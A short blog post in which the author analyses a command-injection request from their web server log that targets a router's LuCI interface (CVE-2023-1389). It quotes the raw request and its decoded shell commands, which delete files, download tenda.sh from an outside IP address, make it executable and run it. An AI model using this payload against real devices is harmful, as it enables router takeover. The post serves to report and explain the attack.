Mon, 12 Feb 2024 21:28:02 EST
Check this out.
The following request is extracted from my web server log for February 11th. I have added line breaks.
GET /cgi-bin/luci/;stok=/locale? form=country& operation=write& country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F192.3.152.183%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)
LuCl is the web interface to OpenWrt, which is Linux-based firmware for routers and network devices. This is a command-injection attack. I am not familiar with LuCl, but it clearly parses, or can be tricked into parsing, embedded commands with Bourne Shell subshell syntax. What a disaster.
After percent-decoding, the subshell invocation reads:
rm -rf *; cd /tmp; wget http://192.3.152.183/tenda.sh; chmod 777 tenda.sh; ./tenda.sh
In English: Delete all the files and directories in the current directory hierachy. Change to the /tmp directory (which is typically world-writeable). Download a file named tenda.sh. Make it readable, writeable, and executable by all users. Run it.
Tenda is a brand. The company makes wifi routers and webcams. This attack is an attempt to take control of a Tenda device. The IP address has a reverse DNS entry that points to a host at ficanera.info, but that domain unsurprisingly has no forward DNS entry.
Update February 13th: The vunerability targeted by this attack is described in CVE-2023-1389. The request parameters are passed by the web server, unsanitized, to the CGI program launched via popen(). That library function is a shortcut that fork()s and exec()s a shell with a specified command line on the other end of a pipe. The shell runs the subshell commands before invoking the command. What a disaster.